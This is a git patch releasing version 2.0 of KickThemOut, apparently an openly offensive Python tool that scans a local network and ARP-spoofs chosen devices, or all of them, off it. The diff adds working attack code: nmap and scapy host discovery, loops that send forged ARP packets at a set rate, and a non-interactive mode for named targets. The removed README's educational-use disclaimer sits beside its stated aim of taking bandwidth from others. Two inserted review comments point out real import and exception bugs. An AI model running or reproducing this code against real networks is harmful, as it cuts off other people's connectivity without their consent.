From 993ec221e3efba19261b6d0732c8bfc474e63e87 Mon Sep 17 00:00:00 2001 From: k4m4 Date: Mon, 5 Feb 2018 21:39:08 +0200 Subject: [PATCH] =?UTF-8?q?=F0=9F=8E=89=20v2.0=20release!!!?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitignore | 1 + .travis.yml | 9 +- CHANGES.rst | 4 - LICENSE | 2 +- README.rst | 109 ------ kickthemout.py | 999 ++++++++++++++++++++++++++++++----------------- readme.md | 142 +++++++ requirements.txt | 5 +- scan.py | 18 +- spoof.py | 13 +- 10 files changed, 815 insertions(+), 487 deletions(-) delete mode 100644 CHANGES.rst delete mode 100644 README.rst create mode 100644 readme.md diff --git a/.gitignore b/.gitignore index 92fd214..f469163 100644 --- a/.gitignore +++ b/.gitignore @@ -25,3 +25,4 @@ ENV/ *.tmp *.bak *.cfg +__pycache__/ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml index a304c84..c8a8e59 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,6 +1,9 @@ language: python python: - - "2.6" - - "2.7" + - "3.4" + - "3.5" + - "3.6" +install: + - pip3 install -r requirements.txt script: - - python -c "import kickthemout; import scan; import spoof" + - python -c "import kickthemout; import scan; import spoof" \ No newline at end of file diff --git a/CHANGES.rst b/CHANGES.rst deleted file mode 100644 index f4047ac..0000000 --- a/CHANGES.rst +++ /dev/null @@ -1,4 +0,0 @@ -0.1 (05.01.2017) ----------------- - -- Initial release. diff --git a/LICENSE b/LICENSE index 0996b5d..8118d78 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ MIT License -Copyright (c) 2017 Nikolaos Kamarinakis +Copyright (c) 2017-18 Nikolaos Kamarinakis Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/README.rst b/README.rst deleted file mode 100644 index 91bb31d..0000000 --- a/README.rst +++ /dev/null 
@@ -1,109 +0,0 @@ -.. image:: http://nikolaskama.me/content/images/2017/02/kickthemout_small.png - -KickThemOut -============ - -`KickThemOut `_ - **Kick Devices Off Your Network** - -A tool to kick devices out of your network and enjoy all the bandwidth for yourself. -It allows you to select specific or all devices and ARP spoofs them off your local area network. - -Compatible with Python 2.6 & 2.7. - -Authors: `Nikolaos Kamarinakis `_ & `David Schütz `_. - -.. image:: https://travis-ci.org/k4m4/kickthemout.svg?branch=master - :target: https://travis-ci.org/k4m4/kickthemout -.. image:: https://img.shields.io/badge/license-MIT-blue.svg - :target: https://github.com/k4m4/kickthemout/blob/master/LICENSE -.. image:: https://img.shields.io/badge/made%20with-%3C3-red.svg - :target: https://nikolaskama.me/kickthemoutproject -.. image:: https://img.shields.io/github/stars/k4m4/kickthemout.svg - :target: https://github.com/k4m4/kickthemout/stargazers - -------------- - -Debian Installation ----------------------- - -You can download KickThemOut by cloning the `Git Repo `_ and simply installing its requirements:: - - $ sudo apt-get update && sudo apt-get install nmap - - $ git clone https://github.com/k4m4/kickthemout.git - - $ cd kickthemout/ - - $ sudo -H pip install --upgrade pip - - $ sudo -H python -m pip install -r requirements.txt - - $ sudo python kickthemout.py - -MacOS Installation ----------------------- - -If you would like to install KickThemOut on a Mac, please run the following:: - - $ sudo -H pip install --upgrade pip - - $ sudo -H pip install pcapy - - $ brew update - - $ brew install --with-python libdnet nmap - -**Keep in mind** that you might be asked to run some commands after executing the previous step. 
Moving on:: - - $ git clone https://github.com/k4m4/kickthemout.git - - $ cd kickthemout/ - - $ sudo -H pip install -r requirements.txt - - $ sudo python kickthemout.py - -**NOTE**: You need to have `Homebrew `_ installed before running the Mac OS installation. - -Arch Installation ----------------------- - -You can download KickThemOut on an Arch based system by executing the following:: - - $ yaourt -S kickthemout-git - - $ sudo kickthemout - -Demo ------ - -Here's a short demo: - -.. image:: https://nikolaskama.me/content/images/2017/01/kickthemout_asciinema.png - :target: https://asciinema.org/a/98200?autoplay=1&loop=1 - -(For more demos click `here `_.) - -Developers ------------ - -* Nikolaos Kamarinakis - `@nikolaskama `_ -* David Schütz - `@xdavidhu `_ - -Disclaimer ------------ - -KickThemOut is provided as is under the MIT Licence (as stated below). -It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible. -In brief, do not use it with evil intent. - -License --------- - -Copyright (c) 2017 by `Nikolaos Kamarinakis `_ & `David Schütz `_. Some rights reserved. - -KickThemOut is under the terms of the `MIT License `_, following all clarifications stated in the `license file `_. - - -For more information head over to the `official project page `_. -You can also go ahead and email me anytime at **nikolaskam{at}gmail{dot}com** or David at **xdavid{at}protonmail{dot}com**. diff --git a/kickthemout.py b/kickthemout.py index c83748c..eccfc47 100644 --- a/kickthemout.py +++ b/kickthemout.py 
@@ -1,39 +1,43 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # kickthemout.py -# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ -import time, os, sys, logging, math +import os, sys, logging, math, traceback, optparse, threading from time import sleep -import urllib2 as urllib -import traceback BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' -notRoot = False try: # check whether user is root if os.geteuid() != 0: - print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END) - notRoot = True + print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END)) + os._exit(1) except: # then user is probably on windows pass -if notRoot: - raise SystemExit + +def shutdown(): + print('\n\n{}Thanks for dropping by.' + '\nCatch ya later!{}'.format(GREEN, END)) + os._exit(1) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! try: + from scapy.config import conf + conf.ipv6_enabled = False from scapy.all import * - import scan, spoof + import scan, spoof, nmap + from urllib.request import urlopen, Request +except KeyboardInterrupt: + shutdown() except: - print("\n{0}ERROR: Requirements have not been satisfied properly. 
Please look at the README file for configuration instructions.").format(RED) - print("\n{0}If you still cannot resolve this error, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format(RED, BLUE, END) - raise SystemExit + print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED)) + print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END)) + os._exit(1) 
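Review bot: The rewritten import line drops `time`, yet the new code still calls `time.sleep(...)`, for example in `scanningAnimation`, which the next hunk adds. The name therefore resolves only if `from scapy.all import *` happens to re-export it. `scanningAnimation` wraps its body in a bare `except:` that calls `os._exit(1)`, so a missing name there would end the process with no message. Keeping the explicit import removes that dependency: `import os, sys, time, logging, math, traceback, optparse, threading`. Separately, `shutdown()` reports status 1 for a user-requested exit, and `os._exit` skips buffer flushing, so the farewell text may be lost when stdout is piped.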
@@ -48,303 +52,86 @@ def heading(): █ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀ ▀ ▀ ▀ ▀ ▀▀▀ """ + END + BLUE + - '\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + - '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format( - YELLOW, RED, YELLOW, BLUE).center(111) + - '\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86)) + '\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + + '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) + + '\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86)) + + + +# loading animation during network scan +def scanningAnimation(text): + try: + global stopAnimation + i = 0 + while stopAnimation is not True: + tempText = list(text) + if i >= len(tempText): + i = 0 + tempText[i] = tempText[i].upper() + tempText = ''.join(tempText) + sys.stdout.write(GREEN + tempText + '\r' + END) + sys.stdout.flush() + i += 1 + time.sleep(0.1) + except: + os._exit(1) # display options def optionBanner(): - print('\nChoose option from menu:\n') + print('\nChoose an option from the menu:\n') sleep(0.2) - print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\t{0}[{1}2{2}]{3} Kick SOME Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\t{0}[{1}3{2}]{3} Kick ALL Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) + print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE)) # initiate debugging process def runDebug(): - print("\n\n{0}WARNING! 
An unknown error has occurred, starting debug...{1}").format(RED, END) + print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END)) print( - "{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format( - RED, END) - print("{0}").format(RED) + "{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format( + RED, END)) try: print("Current defaultGatewayMac: " + defaultGatewayMac) except: print("Failed to print defaultGatewayMac...") try: - print("Reloading mac getter function...") + print("Reloading MAC retriever function...") regenOnlineIPs() print("Reloaded defaultGatewayMac: " + defaultGatewayMac) except: - print("Failed to reload mac getter function / to print defaultGatewayMac...") + print("Failed to reload MAC retriever function / to print defaultGatewayMac...") try: print("Known gateway IP: " + defaultGatewayIP) except: print("Failed to print defaultGatewayIP...") - try: - print("Current hostslist array: ") - print(hostsList) - except: - print("Failed to print hostsList array...") try: print("Crash trace: ") print(traceback.format_exc()) except: print("Failed to print crash trace...") print("DEBUG FINISHED.\nShutting down...") - print("{0}").format(END) - raise SystemExit + print("{}".format(END)) + os._exit(1) -# regenerate online IPs array & configure gateway -def regenOnlineIPs(): - global onlineIPs - global defaultGatewayMac - global defaultGatewayMacSet - - if not defaultGatewayMacSet: - defaultGatewayMac = "" - - onlineIPs = [] - for host in hostsList: - onlineIPs.append(host[0]) - if not defaultGatewayMacSet: - if host[0] == defaultGatewayIP: - defaultGatewayMac = host[1] - - if not defaultGatewayMacSet and defaultGatewayMac == "": - # request gateway MAC address (after failed detection by scapy) - print("\n{0}ERROR: 
Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) - header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) - defaultGatewayMac = raw_input(header) - defaultGatewayMacSet = True - - - -# scan network -def scanNetwork(): - global hostsList +# make sure there is an internet connection +def checkInternetConnection(): try: - # call scanning function from scan.py - hostsList = scan.scanNetwork(getDefaultInterface(True)) + urlopen('https://google.com', timeout=3) + return True + except urllib.URLError as err: + return False except KeyboardInterrupt: - print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END) - raise SystemExit - except: - print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END) - raise SystemExit - regenOnlineIPs() - -def get_hostname(ip): - try: - hostname = utils.socket.gethostbyaddr(ip)[0] - except: - pass - if ip == utils.socket.getfqdn(ip): - hostname = 'N/A' - return hostname - - - -# kick one device -def kickoneoff(): - os.system("clear||cls") - print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + mac + "{4}\t" + vendor + "(" + hostname + ")" + "{5}").format(YELLOW, WHITE, RED, BLUE, GREEN, END) - - canBreak = False - while not canBreak: - try: - choice = int(raw_input("\nChoose a target: ")) - one_target_ip = onlineIPs[choice] - canBreak = True - except KeyboardInterrupt: - return - except: - print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, 
END) - - # locate MAC of specified device - one_target_mac = "" - for host in hostsList: - if host[0] == one_target_ip: - one_target_mac = host[1] - if one_target_mac == "": - print("\nIP address is not up. Please try again.") - return - - print("\n{0}Target: {1}" + one_target_ip).format(GREEN, END) - - print("\n{0}Spoofing started... {1}").format(GREEN, END) - try: - while True: - # broadcast malicious ARP packets (10p/s) - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) - time.sleep(10) - except KeyboardInterrupt: - # re-arp target on KeyboardInterrupt exception - print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - try: - # broadcast ARP packets with legitimate info to restore connection - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END) - - - -# kick multiple devices -def kicksomeoff(): - os.system("clear||cls") - print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "(" + hostname + ")" + "{4}" ).format(YELLOW, WHITE, RED, GREEN, END) - - canBreak = False - while not canBreak: - try: - choice = raw_input("\nChoose devices to target(comma-separated): ") - if ',' in choice: - some_targets = choice.split(",") - canBreak = True - else: - print("\n{0}ERROR: Please select more than 1 devices from the list.{1}\n").format(RED, END) - except KeyboardInterrupt: - return - - some_ipList = "" - for i in 
some_targets: - try: - some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', " - except KeyboardInterrupt: - return - except: - print("\n{0}ERROR: '{1}" + i + "{2}' is not in the list.{3}\n").format(RED, GREEN, RED, END) - return - some_ipList = some_ipList[:-2] + END - - print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END) - - print("\n{0}Spoofing started... {1}").format(GREEN, END) - try: - while True: - # broadcast malicious ARP packets (10p/s) - for i in some_targets: - ip = onlineIPs[int(i)] - for host in hostsList: - if host[0] == ip: - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) - time.sleep(10) - except KeyboardInterrupt: - # re-arp targets on KeyboardInterrupt exception - print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - # broadcast ARP packets with legitimate info to restore connection - for i in some_targets: - ip = onlineIPs[int(i)] - for host in hostsList: - if host[0] == ip: - try: - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) - - - -# kick all devices -def kickalloff(): - os.system("clear||cls") - print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "(" + hostname + ")" + "{2}").format(RED, GREEN, END)) - - print("\n{0}Spoofing started... 
{1}").format(GREEN, END) - try: - # broadcast malicious ARP packets (10p/s) - reScan = 0 - while True: - for host in hostsList: - if host[0] != defaultGatewayIP: - # dodge gateway (avoid crashing network itself) - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) - reScan += 1 - if reScan == 4: - reScan = 0 - scanNetwork() - time.sleep(10) - except KeyboardInterrupt: - print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - # broadcast ARP packets with legitimate info to restore connection - for host in hostsList: - if host[0] != defaultGatewayIP: - try: - # dodge gateway - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) + shutdown() 
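Review bot: In `checkInternetConnection`, `except urllib.URLError as err:` cannot match on Python 3. This commit imports only `urlopen` and `Request` from `urllib.request`, so `urllib` is not bound by the visible imports, and `URLError` lives in `urllib.error` in any case. When `urlopen` fails, evaluating that clause raises instead of returning False, so the offline path crashes rather than reporting that there is no connection. `URLError` and socket timeouts are both `OSError` subclasses, so `except OSError:` followed by `return False` covers the case without a new import. The unused `err` binding can be dropped as well.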
@@ -373,124 +160,624 @@ def getDefaultInterface(returnNet=False): -# retrieve gateway IP -def getGatewayIP(): - try: - getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) - return getGateway_p.src - except: - # request gateway IP address (after failed detection by scapy) - print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END) - header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) - gatewayIP = raw_input(header) - return gatewayIP - - - # retrieve default interface MAC address def getDefaultInterfaceMAC(): try: defaultInterfaceMac = get_if_hwaddr(defaultInterface) if defaultInterfaceMac == "" or not defaultInterfaceMac: print( - "\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format( - RED, END) - header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) - defaultInterfaceMac = raw_input(header) - return defaultInterfaceMac + "\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format( + RED, END)) + header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) + return (input(header)) else: return defaultInterfaceMac except: # request interface MAC address (after failed detection by scapy) - print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) - header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) - defaultInterfaceMac = raw_input(header) - return defaultInterfaceMac + print("\n{}ERROR: Default Interface MAC Address could not be obtained. 
Please enter MAC manually.{}\n".format(RED, END)) + header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) + return (input(header)) + + + +# retrieve gateway IP +def getGatewayIP(): + global stopAnimation + try: + getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) + return getGateway.src + except: + # request gateway IP address (after failed detection by scapy) + stopAnimation = True + print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END)) + header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) + return (input(header)) + + + +# retrieve host MAC address +def retrieveMACAddress(host): + try: + query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host) + ans, _ = srp(query, timeout=2, verbose=0) + for _, rcv in ans: + return rcv[Ether].src + break + except: + return False # resolve mac address of each vendor def resolveMac(mac): try: - # sen request to macvendors.co - url = "https://macvendors.co/api/vendorname/" - request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"}) - response = urllib.urlopen(request) + # send request to macvendors.co + url = "http://macvendors.co/api/vendorname/" + request = Request(url + mac, headers={'User-Agent': "API Browser"}) + response = urlopen(request) vendor = response.read() vendor = vendor.decode("utf-8") vendor = vendor[:25] return vendor + except KeyboardInterrupt: + shutdown() except: return "N/A" +# regenerate online IPs array & configure gateway +def regenOnlineIPs(): + global onlineIPs, defaultGatewayMac, defaultGatewayMacSet + + if not defaultGatewayMacSet: + defaultGatewayMac = "" + + onlineIPs = [] + for host in hostsList: + onlineIPs.append(host[0]) + if not defaultGatewayMacSet: + if host[0] == defaultGatewayIP: + defaultGatewayMac = host[1] + + if not defaultGatewayMacSet and defaultGatewayMac == "": + # request gateway MAC address 
(after failed detection by scapy) + print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END)) + header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) + defaultGatewayMac = input(header) + defaultGatewayMacSet = True + + + +# scan network +def scanNetwork(): + global hostsList + try: + # call scanning function from scan.py + hostsList = scan.scanNetwork(getDefaultInterface(True)) + except KeyboardInterrupt: + pass + except: + print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END)) + os._exit(1) + regenOnlineIPs() + + + +# non-interactive attack +def nonInteractiveAttack(): + + print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END)) + + target = options.targets + print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target))) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Checking target status...',)) + t.daemon = True + t.start() + + try: + nm = nmap.PortScanner() + counter = 0 + for host in target: + a = nm.scan(hosts=host, arguments='-sn') + if a['scan'] != {}: + for k, v in a['scan'].items(): + if str(v['status']['state']) == 'up': + pass + else: + if len(target) == 1 or counter == len(target)-1: + stopAnimation = True + sys.stdout.write("\033[K") + print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END)) + os._exit(1) + else: + sys.stdout.write("\033[K") + print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END)) + target.remove(host) + counter += 1 + pass + else: + if len(target) == 1 or counter == len(target)-1: + stopAnimation = True + sys.stdout.write("\033[K") + print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. 
Exiting...{}".format(RED, END, str(host), RED, END)) + os._exit(1) + else: + sys.stdout.write("\033[K") + print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END)) + target.remove(host) + counter += 1 + pass + + stopAnimation = True + sys.stdout.write("\033[K") + + defaultGatewayIP = getGatewayIP() + defaultGatewayMac = retrieveMACAddress(defaultGatewayIP) + + except KeyboardInterrupt: + shutdown() + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + for i in target: + ipAddress = i + macAddress = retrieveMACAddress(ipAddress) + if macAddress == False: + print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END)) + os._exit(1) + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp targets on KeyboardInterrupt exception + print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for i in target: + ipAddress = i + try: + macAddress = retrieveMACAddress(ipAddress) + except: + print("\n{}ERROR: MAC address of target host could not be retrieved! 
Maybe host is down?{}".format(RED, END)) + os._exit(1) + try: + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END)) + + + +# kick one device +def kickoneoff(): + os.system("clear||cls") + + print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Online IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + canBreak = False + while not canBreak: + try: + choice = int(input("\nChoose a target: ")) + oneTargetIP = onlineIPs[choice] + canBreak = True + except KeyboardInterrupt: + shutdown() + except: + print("\n{}ERROR: Please enter a number from the list!{}".format(RED, END)) + + # locate MAC of specified device + oneTargetMAC = "" + for host in hostsList: + if host[0] == oneTargetIP: + oneTargetMAC = host[1] + if oneTargetMAC == "": + print("\nIP address is not up. Please try again.") + return + + print("\n{}Target: {}{}".format(GREEN, END, oneTargetIP)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... 
{}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, oneTargetIP, oneTargetMAC) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp target on KeyboardInterrupt exception + print("\n{}Re-arping{} target...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + try: + # broadcast ARP packets with legitimate info to restore connection + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} target successfully.{}".format(RED, GREEN, END)) + + + +# kick multiple devices +def kicksomeoff(): + os.system("clear||cls") + + print("\n{}kickSOMEOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Online IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + canBreak = False + while not canBreak: + try: + choice = input("\nChoose devices to target (comma-separated): ") + if ',' in choice: + someTargets = choice.split(",") + canBreak = True + else: + print("\n{}ERROR: Please select more than 1 devices from the list.{}\n".format(RED, END)) + except KeyboardInterrupt: + shutdown() + + someIPList = "" + for i in someTargets: + try: + someIPList += onlineIPs[int(i)] 
+ ", " + except KeyboardInterrupt: + shutdown() + except: + print("\n{}ERROR: '{}{}{}' is not in the list.{}\n".format(RED, GREEN, i, RED, END)) + return + someIPList = someIPList[:-2] + END + + print("\n{}Targets: {}{}".format(GREEN, END, someIPList)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + for i in someTargets: + ip = onlineIPs[int(i)] + for host in hostsList: + if host[0] == ip: + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp targets on KeyboardInterrupt exception + print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for i in someTargets: + ip = onlineIPs[int(i)] + for host in hostsList: + if host[0] == ip: + try: + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END)) + + + +# kick all devices +def kickalloff(): + os.system("clear||cls") + + print("\n{}kickALLOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + 